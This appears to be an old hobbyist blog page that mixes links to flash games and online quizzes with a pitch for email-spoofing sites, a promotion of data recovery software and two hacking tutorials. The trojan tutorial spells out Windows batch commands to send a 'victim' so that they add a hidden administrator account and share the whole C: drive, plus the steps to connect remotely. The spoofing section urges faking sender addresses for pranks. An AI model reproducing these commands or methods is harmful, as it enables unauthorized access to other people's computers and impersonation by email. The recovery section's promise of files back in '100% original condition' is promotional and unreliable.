FUNNY AND INTRESTING u like it

SOME COOL FLASHES:
1. PLAY THE DRUMS -U are given a set of drums,just hit them.

2. DANCE – very funny one.Just type your name when the flash loads and check out the performance.

3. FINALE  

4. KITTEN SHOOT -have a Shooting practice   

5. SINGING HORSES
6. HOLES -A very good game for passing on the time

7. CAT
8. MINIPUTT -A very good golf game.  

9. PENGUIN -Another flash game for passing the time.

10. BEATS -VERY GOOD ONE
11. ROCK BAND -Play your own rock band  

12. RAP
13. SEE IT - See what your computer Iconsdo when you are not home.
14. SMOKE KILLS -VERY GOOD ONE..I love this.
15. FIETS -Another flash game.    

16. TERROR
 

Most annoying webpage in the internet : click here
The real person behind Bush : click here
Make your own error message: click here
FOR all those who love the game SCRIBBLER: click here
A small challenge for all your senses.just check it out once: click here
For all those of you who are interested in knowing about your past life: click here
wanna write a letter with blood and send it to someone?? : click here
Check your hand to eye co ordination : click here
ringtones only kids can hear : click here
A very good creative clock : click here
Check Your Age On Other PLanets :click here
A complete test of your IQ(intelligent quotient):click here
Another of these insane(but nice) tests! If So you died (it’s okay, it happens). This survey will tell you approximately how much your body would sell for : click here
See this crazy website that pays you to sell your “soul” to them : click here
Know about ur personality based on a simple drawing test : click here

SEND FAKE MAILS

hey guys ever thought of sending fake mails or anonymous mails to your friends??Sounds crazy??
But its really possible.There are few websites in the internet which will allow you to send fake and anonymous mails keeping your identity a secret.Using these websites you can send a mail from any address to any address.A very good option to play a prank with your frenz and even your foes(just for educational and fun purpose).This service is perfect for the following
  • catch a cheating spouse husband or wife.
  • find out if your friend is are real friend
  • give warnings to people
  • inform the police about illegal activities
  • inform the tax office about tax cheaters
  • confess your love to somebody
  • play an email joke with your friends
  • when your own email service doesn’t work
  • if your private email is banned by the recipient
  • report fraud to your boss or institution
  • and many more reasons…
Here are few websites which will allow you to do
it….
1.send fake mail
2.send fake mail
3.send fake mail
4.send fake mail
5.send fake mail
6.send fake mail
7.send fake mail
8.send fake mail

Recover deleted files from hard drive

Have you accidentally deleted an important file?.Then you need not to worry even if you have deleted the file from recycle bin.If you realize that you have accidentally deleted a file from hard drive then you must act immediately to recover it.In this post you will find a detailed information on how to recover the deleted files from your Windows PC or Mac.





If you search for "data recovery service" or "data recovery software" you will come across hundreds of softwares claiming to recover deleted files but they don't.Their purpose is just to take your money.These data recovery software's are either neither effective nor capable of recovering your files in its original condition.I have tested lots of data recovery softwares and found the following software as the best data recovery software.

1. Stellar Phoenix Data Recovery (for Windows)

2. Stellar Phoenix Mac Data Recovery (for Mac)

What is Stellar Phoenix?

Stellar Phoenix Windows Data Recovery Software is a comprehensive windows partition recovery solution for data loss due to partition corruption, partition resizing, file system damage, boot sector corruption, MBR damage, virus infection and human errors.

Will I be able to recover the files back?
Since the operating system doesn’t immediately re-use the space from the deleted files, it is most certainly possible to recover the deleted files back in 100% original condition.


How to recover lost files with Stellar phoenix data recovery software?

Files & folders are also deleted using Shift+Delete key. By using Shift+Delete key, files are deleted permanently and its contents will not be stored in the recycle bin. An ordinary computer user will assume that using Shift+Delete key will permanently delete a file from the system. If the data which has got deleted is important then it becomes very essential to recover that data as quickly as possible. It needs to be recovered using data recovery software to locate, recover and restore all the important files and folders.

Stellar Phoenix Windows Data Recovery Software is an ideal solution to all your Windows related data loss problems. This software is an advanced recovery software designed for safe and non-destructive data recovery from hard drive or any other removable storage media. It also supports recovery of raw data from badly corrupted storage media. Additionally, it also offers data recovery from formatted drives.

Features:

With Stellar phoenix data recovery software you can:

1.Recover FAT16, FAT32, VFAT, NTFS, and NTFS5 file system partitions
2.Recover deleted emails
3.Recover deleted documents
4.Recover deleted photos
5.Recover deleted music
6.Formatted Hard-Drive recovery
7.Recover files from USB Drives, CDs, DVDs and memory cards
8.Recover almost all the camera format files

and much more.

How to Create a trojan in .bat file?

A Trojan, sometimes referred to as a Trojan horse, is non-self-replicating malware that appears to perform a desirable function for the user but instead facilitates unauthorized access to the user's computer system.
In this post i will tell you How to create your own trojan horse in a .bat file,Helping you to hack into another persons computer.I had previously  posted a tutorial on How to sent a trojan as a txt file but this post will explain you creating a Trojan in a .bat file to infect a Remote computer

Creating a Trojan in a .bat file - Procdure

1.Go to start and click on run and type cmd

2.Now insert this command: net

And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.

Open notepad and write there:
    
                dir
                pause                                         

And now save this as test.bat and execute it.

---------------------- Starting -------------------
-:Server:-
The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.

If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it's nice
yo know which version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

-!extras!-
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access. 


Hope you  liked the post! Pass the comments

creat VIRUS Batch Files ?

What are Batch Files ?

According to wikipedia a batch file is a text file containing a series of commands intended to be executed by the command interprete, In this article I will be telling you the basics of batch files clear and developing the approach towards coding your own viruses. Lets begin with a simple example ,


Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'








folder/directory 'x', then enter in folder 'x',then make a folder 'y' in folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat



Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we run the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.






Watch Live Tv Here